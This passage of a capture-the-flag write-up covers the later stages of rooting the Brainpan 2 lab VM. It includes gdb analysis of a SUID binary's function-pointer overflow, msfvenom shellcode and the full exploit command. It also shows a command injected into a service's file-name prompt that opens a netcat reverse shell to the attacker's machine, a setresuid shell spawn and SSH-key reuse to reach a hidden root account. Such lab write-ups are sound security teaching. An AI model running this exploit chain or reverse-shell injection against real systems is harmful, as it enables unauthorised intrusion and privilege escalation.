anansi@brainpan2:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Nov  4  2013 .
drwxr-xr-x 22 root    root    4096 Nov  5  2013 ..
drwx------  2 anansi  anansi  4096 Jun  6 07:03 anansi
drwx------  4 puck    puck    4096 Nov  5  2013 puck
drwxr-xr-x  3 reynard reynard 4096 Nov  7  2013 reynard
anansi@brainpan2:/home$ cd anansi
cd anansi
anansi@brainpan2:~$ ls -la
ls -la
total 28
drwx------ 2 anansi anansi 4096 Jun  6 07:03 .
drwxr-xr-x 5 root   root   4096 Nov  4  2013 ..
-rw------- 1 anansi anansi    0 Nov  5  2013 .bash_history
-rw-r--r-- 1 anansi anansi  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 anansi anansi 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 anansi anansi  675 Nov  4  2013 .profile
-rw-r--r-- 1 anansi anansi   22 Jun  6 07:03 somefilename
-rwxr-xr-x 1 anansi anansi  114 Nov  4  2013 startbrainpan.sh
anansi@brainpan2:~$ cd ..
cd ..
anansi@brainpan2:/home$ ls
ls
anansi  puck  reynard
anansi@brainpan2:/home$ cd reynard
cd reynard
anansi@brainpan2:/home/reynard$ ls -la
ls -la
total 44
drwxr-xr-x 3 reynard reynard 4096 Nov  7  2013 .
drwxr-xr-x 5 root    root    4096 Nov  4  2013 ..
-rw------- 1 reynard reynard    0 Nov  7  2013 .bash_history
-rw-r--r-- 1 reynard reynard  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 reynard reynard 3392 Nov  4  2013 .bashrc
-rwsr-xr-x 1 root    root    8999 Nov  6  2013 msg_root
-rw-r--r-- 1 reynard reynard  675 Nov  4  2013 .profile
-rw-r--r-- 1 reynard reynard  154 Nov  5  2013 readme.txt
-rwxr-xr-x 1 reynard reynard  137 Nov  4  2013 startweb.sh
drwxr-xr-x 3 reynard reynard 4096 Nov  4  2013 web
anansi@brainpan2:/home/reynard$ ./msg_root
./msg_root
usage: msg_root username message
Nothing interesting in anansi folder, but I could access reynard home folder and found there an interesting app. I've started SimpleHTTPServer inside his folder and downloaded a binary.
>_ term
anansi@brainpan2:/home/reynard$ python -m SimpleHTTPServer 12000
python -m SimpleHTTPServer 12000
Serving HTTP on 0.0.0.0 port 12000 ...
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET / HTTP/1.1" 200 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:09] code 404, message File not found
192.168.57.1 - - [06/Jun/2014 07:33:09] "GET /favicon.ico HTTP/1.1" 404 -
192.168.57.1 - - [06/Jun/2014 07:33:11] "GET /msg_root HTTP/1.1" 200 -
At this point I knew that there's probably a some way to exploit that binary. Why? That's why:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa                   
Segmentation fault
anansi@brainpan2:/home/reynard$
Let's make some reverse engineering.
>_ term
$ gdb msg_root
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/..../msg_root...done.
(gdb) r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Starting program: /home/..../brainpan2/msg_root aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x0804872e in get_name (u=0xffffd5c3 'a' <repeats 108 times>, m=0xffffd630 'a' <repeats 87 times>) at msg_root.c:26
#2  0x0804877b in main (argc=3, argv=0xffffd434) at msg_root.c:35
I've checked file in hte and found some functions inside:
- save_msg
- get_name
- main
When app is executed it goes: main -> get_name -> save_msg. Looking on backtrace from crash I noticed address 0x0804872e which is inside method get_name. Disassembling this function gives code like below:
>_ term
Dump of assembler code for function get_name:
   0x080486a1 <+0>:    push   %ebp
   0x080486a2 <+1>:    mov    %esp,%ebp
   0x080486a4 <+3>:    sub    $0x20,%esp
   0x080486a7 <+6>:    movl   $0x804863c,-0x4(%ebp)
   0x080486ae <+13>:    mov    0x8(%ebp),%eax
   0x080486b1 <+16>:    mov    %eax,(%esp)
   0x080486b4 <+19>:    call   0x8048500 <strlen@plt>
   0x080486b9 <+24>:    cmp    $0x11,%eax
   0x080486bc <+27>:    ja     0x80486d2 <get_name+49>
   0x080486be <+29>:    mov    0x8(%ebp),%eax
   0x080486c1 <+32>:    mov    %eax,0x4(%esp)
   0x080486c5 <+36>:    lea    -0x12(%ebp),%eax
   0x080486c8 <+39>:    mov    %eax,(%esp)
   0x080486cb <+42>:    call   0x80484b0 <strcpy@plt>
   0x080486d0 <+47>:    jmp    0x80486ec <get_name+75>
   0x080486d2 <+49>:    movl   $0x12,0x8(%esp)
   0x080486da <+57>:    mov    0x8(%ebp),%eax
   0x080486dd <+60>:    mov    %eax,0x4(%esp)
   0x080486e1 <+64>:    lea    -0x12(%ebp),%eax
   0x080486e4 <+67>:    mov    %eax,(%esp)
   0x080486e7 <+70>:    call   0x8048540 <strncpy@plt>
   0x080486ec <+75>:    movl   $0x7d0,(%esp)
   0x080486f3 <+82>:    call   0x80484c0 <malloc@plt>
   0x080486f8 <+87>:    mov    %eax,-0x8(%ebp)
   0x080486fb <+90>:    mov    0xc(%ebp),%eax
   0x080486fe <+93>:    mov    %eax,(%esp)
   0x08048701 <+96>:    call   0x8048500 <strlen@plt>
   0x08048706 <+101>:    mov    %eax,0x8(%esp)
   0x0804870a <+105>:    mov    0xc(%ebp),%eax
   0x0804870d <+108>:    mov    %eax,0x4(%esp)
   0x08048711 <+112>:    mov    -0x8(%ebp),%eax
   0x08048714 <+115>:    mov    %eax,(%esp)
   0x08048717 <+118>:    call   0x8048540 <strncpy@plt>
   0x0804871c <+123>:    mov    -0x8(%ebp),%eax
   0x0804871f <+126>:    mov    %eax,0x4(%esp)
   0x08048723 <+130>:    lea    -0x12(%ebp),%eax
   0x08048726 <+133>:    mov    %eax,(%esp)
=> 0x08048729 <+136>:    mov    -0x4(%ebp),%eax
   0x0804872c <+139>:    call   *%eax
   0x0804872e <+141>:    mov    -0x8(%ebp),%eax
   0x08048731 <+144>:    mov    %eax,(%esp)
   0x08048734 <+147>:    call   0x8048490 <free@plt>
   0x08048739 <+152>:    leave
   0x0804873a <+153>:    ret  
End of assembler dump.
The arrow points instruction that moves content of the address 4bytes before ebp and moves it to eax and then jumps to it. Here's how this looks when user provides valid input:
>_ term
 Breakpoint 2, 0x08048729 in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0xffffd3e6    -11290
(gdb) x $ebp-4
0xffffd3f4:    0x0804863c
(gdb) x/12xw $esp
0xffffd3d8:    0xffffd3e6    0x0804a008    0x00000012    0x6161d4b4
0xffffd3e8:    0x61616161    0xffff0061    0x0804a008    0x0804863c
0xffffd3f8:    0xffffd408    0x0804877b    0xffffd644    0xffffd64c
You can notice few 61 which corresponds to  "aaaaaaa". Command x $ebp-4 shows what will be moved to eax, address 0x0804863c is where save_msg method starts. Checking address 0x0804a008 which is ebp-8 shows that this is a memory where second argument is copied (in my case it's a few b's which are 0x62 below):
>_ term
(gdb) x/8xw 0x0804a008
0x804a008:    0x62626262    0x62626262    0x62626262    0x62626262
0x804a018:    0x00006262    0x00000000    0x00000000    0x00000000
Moving further:
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd644 "aaaaaaa", m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3f8    0xffffd3f8
eax            0x804863c    134514236
you can see eax is now pointing to save_msg. Providing long first argument one can overwrite memory which will be copied to eax and thus crash the app, as shown below:
>_ term
Breakpoint 2, 0x08048729 in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) x/16xw $esp
0xffffd3a8:    0xffffd3b6    0x0804a008    0x00000012    0x6161d484
0xffffd3b8:    0x61616161    0x61616161    0x0804a008    0x61616161
0xffffd3c8:    0xffffd3d8    0x0804877b    0xffffd60c    0xffffd64c
0xffffd3d8:    0xffffd458    0xf7e6ee46    0x00000003    0xffffd484
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0xffffd3b6    -11338
(gdb) s

Breakpoint 3, 0x0804872c in get_name (u=0xffffd60c 'a' <repeats 63 times>, m=0xffffd64c 'b' <repeats 18 times>) at msg_root.c:26
26    in msg_root.c
(gdb) i r ebp eax
ebp            0xffffd3c8    0xffffd3c8
eax            0x61616161    1633771873
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
Armored with that knowledge I started exploitation phase. My idea was simple. Provide address to the shellcode in first argument while writing the shellcode in the second one. So the first argument can only be the 0x0804a008 repeated few times which gives me:

For the second argument I've needed shellcode. You can find one online or use msfvenom:
>_ term
$ msfvenom -p linux/x86/exec CMD="/bin/sh" -b "x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
buf =  ""
buf += "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2"
buf += "\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01"
buf += "\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70"
buf += "\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d"
buf += "\x3d\xd4\x0e\x4c\x41"
Here's the second argument:
And command in action:
>_ term
anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "\x04\x08\x08\xa0"x8;'` `perl -e 'print "\xdb\xd2\xbe\xae\x71\x9c\x42\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0b\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x5b\x1b\x97\x1a\x3a\x8e\xc1\xf2\x11\x4c\x87\xe4\x01\xbd\xe4\x82\xd1\xa9\x25\x31\xb8\x47\xb3\x56\x68\x70\xcb\x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`
<x98\x8c\x80\xe3\xfa\xe5\xee\xd4\x89\x9d\xee\x7d\x3d\xd4\x0e\x4c\x41";'`    
$ id
id
uid=1000(anansi) gid=1000(anansi) euid=104(root) groups=106(root),50(staff),1000(anansi)
$ cd /root
cd /root
$ ls -la
ls -la
total 28
drwx------  3 root  root  4096 Nov  5  2013 .
drwxr-xr-x 22 root  root  4096 Nov  5  2013 ..
drwx------  2 root  root  4096 Nov  4  2013 .aptitude
-rw-------  1 root  root     0 Nov  5  2013 .bash_history
-rw-r--r--  1 root  root   589 Nov  5  2013 .bashrc
-rw-r--r--  1 root  root   159 Nov  5  2013 .profile
-rw-------  1 root  root   461 Nov  5  2013 flag.txt
-rw-------  1 root  root   245 Nov  5  2013 whatif.txt
$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
$ cat whatif.txt
cat whatif.txt

       WHAT IF I TOLD YOU
              ___
            /     \
           | ______\
          (, \_/ \_/
           |   ._. |
           \   --- /
           /`-.__.'
      .---'`-.___|\___
     /                `.

       YOU ARE NOT ROOT?
$ ls -n
ls -n
total 8
-rw------- 1   0   0 461 Nov  5  2013 flag.txt
-rw------- 1 104 106 245 Nov  5  2013 whatif.txt
I must say, the trick with the root account is a nice one. There are two accounts one named "root" and the other one "root " (with a space on the end). The second one is the real root here. There's still a long road before me...I looked for SUID/SGID execs:
>_ term
$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
...
/opt/old/brainpan-1.8/brainpan-1.8.exe
...
This one in opt folder caught my attention. I found some files in that folder:
$ ls -la
ls -la
total 36
drwxrwxr-x 2 root  staff  4096 Nov  5  2013 .
drwx------ 3 root  root   4096 Nov  4  2013 ..
-rwsr-xr-x 1 puck  puck  17734 Nov  4  2013 brainpan-1.8.exe
-rw-r--r-- 1 puck  puck   1227 Nov  5  2013 brainpan.7
-rw-rw-rw- 1 puck  staff    27 Nov  5  2013 brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=127.0.0.1
Let's modify the cfg to run app on all addresses:
$ echo "port=9333" > brainpan.cfg
echo "port=9333" > brainpan.cfg
$ echo "ipaddr=0.0.0.0" >> brainpan.cfg
echo "ipaddr=0.0.0.0" >> brainpan.cfg
$ cat brainpan.cfg
cat brainpan.cfg
port=9333
ipaddr=0.0.0.0
I've started the app and connected from my machine:
>_ term
$ nc 192.168.57.10 9444
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[______________________ WELCOME TO BRAINPAN 1.8________________________]
                             LOGIN AS GUEST                            

                          >> GUEST
                          ACCESS GRANTED


                             *  *  *  *                               
    THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED. 
    TYPE "TELL ME MORE" FOR A LIST OF COMMANDS. 
                             *  *  *  *                               

                          >> VIEW
    ENTER FILE TO DOWNLOAD: a; nc -e /bin/sh 192.168.57.1 5600
>_ term
$ nc -l -p 5600 -v
nc: listening on :: 5600 ...
nc: listening on 0.0.0.0 5600 ...
nc: connect to 192.168.57.1 5600 from 192.168.57.10 (192.168.57.10) 41003 [41003]
id
uid=1000(anansi) gid=1000(anansi) euid=1001(puck) groups=1001(puck),50(staff),1000(anansi)
We are almost the user "puck". There are few ways to elevate our id from 1000 to 1001. I've show one in this post and here's it in action:
>_ term
python -c 'import os,pty;os.setresuid(1001,1001,1001);pty.spawn("/bin/bash");'
puck@brainpan2:/opt/old/brainpan-1.8$ whoami
whoami
puck
puck@brainpan2:/opt/old/brainpan-1.8$ id
id
uid=1001(puck) gid=1000(anansi) groups=1001(puck),50(staff),1000(anansi)
puck@brainpan2:/opt/old/brainpan-1.8$
Let's check puck's folder:
>_ term
puck@brainpan2:/opt/old/brainpan-1.8$ cd /home
cd /home
puck@brainpan2:/home$ cd puck
cd puck
puck@brainpan2:/home/puck$ ls -la
ls -la
total 28
drwx------ 4 puck  puck  4096 Nov  5  2013 .
drwxr-xr-x 5 root  root  4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck  4096 Nov  5  2013 .backup
-rw------- 1 puck  puck     0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck   220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck  3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck   675 Nov  4  2013 .profile
drwx------ 2 puck  puck  4096 Nov  5  2013 .ssh
Looks clean, backup folder looks suspicious. I've checked it:
>_ term
puck@brainpan2:/home/puck$ cd .backup
cd .backup
puck@brainpan2:/home/puck/.backup$ ls -la
ls -la
total 28
drwxr-xr-x 3 puck puck 4096 Nov  5  2013 .
drwx------ 4 puck puck 4096 Nov  5  2013 ..
-rw------- 1 puck puck  395 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck puck  220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck puck 3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck puck  675 Nov  4  2013 .profile
drwx------ 2 puck puck 4096 Nov  4  2013 .ssh
Not empty bash_history? That's strange:
>_ term
puck@brainpan2:/home/puck/.backup$ cat .bash_history
cat .bash_history
cd /usr/local/bin
ls -l
./msg_root "comment on the latest version please"
cd /opt/brainpan/
ps aux
vi brainpan-1.8.c
cd ../archive
netstat -antp
netstat -antp | grep 9888
cd ..
ls
cd old
ls
cd brainpan-1.8
vi brainpan-1.8.c
ssh -l "root " brainpan2
vi brainpan.7
man ./brainpan.7
ls
htop
top
ls -latr
cat .bash_history
ls
mkdir .backup
mv .ssh .bash* .backup
cd .backup/
ls
clear
ls -latr
exit
puck@brainpan2:/home/puck/.backup$
So user puck can login on the root through ssh. Dunno why but I've done this:
>_ term
puck@brainpan2:/home/puck$ mv .ssh .ssh-old
mv .ssh .ssh-old
puck@brainpan2:/home/puck$ cp -rp .backup/.ssh .
cp -rp .backup/.ssh .
puck@brainpan2:/home/puck$ ls -la
ls -la
total 32
drwx------ 5 puck  puck   4096 Jun  6 10:31 .
drwxr-xr-x 5 root  root   4096 Nov  4  2013 ..
drwxr-xr-x 3 puck  puck   4096 Nov  5  2013 .backup
-rw------- 1 puck  puck      0 Nov  5  2013 .bash_history
-rw-r--r-- 1 puck  puck    220 Nov  4  2013 .bash_logout
-rw-r--r-- 1 puck  puck   3392 Nov  4  2013 .bashrc
-rw-r--r-- 1 puck  puck    675 Nov  4  2013 .profile
drwx------ 2 puck  anansi 4096 Nov  4  2013 .ssh
drwx------ 2 puck  puck   4096 Nov  5  2013 .ssh-old
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2
ssh -l "root " brainpan2
ssh: connect to host brainpan2 port 22: Connection refused
Either ssh is not running or it's running on different port.
>_ term
puck@brainpan2:/home/puck$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 2222
...
Got ya!
>_ term
puck@brainpan2:/home/puck$ ssh -l "root " brainpan2 -p 2222
ssh -l "root " brainpan2 -p 2222
The authenticity of host '[brainpan2]:2222 ([127.0.1.1]:2222)' can't be established.
ECDSA key fingerprint is 0a:15:1c:1c:25:b0:fe:54:8a:35:45:e5:b8:02:97:1a.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '[brainpan2]:2222' (ECDSA) to the list of known hosts.
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov  7 11:00:06 2013
root @brainpan2:~# cat /root/flag.txt
cat /root/flag.txt

                          !!! CONGRATULATIONS !!!

                 You've completed the Brainpan 2 challenge!
                 Or have you...?

                 Yes, you have! Pat yourself on the back. :-)

                 Questions, comments, suggestions for new VM
                 challenges? Let me know!


                 Twitter: <redacted>
                 Email  : <redacted>
                 Web    : http://www.techorganic.com

root @brainpan2:~#
That's all! I must say I've really enjoyed this one. There were a few times when I wanted to grab my laptop and learn it fly but beating these moments gave me a lot of satisfaction and new experiences. See you soon!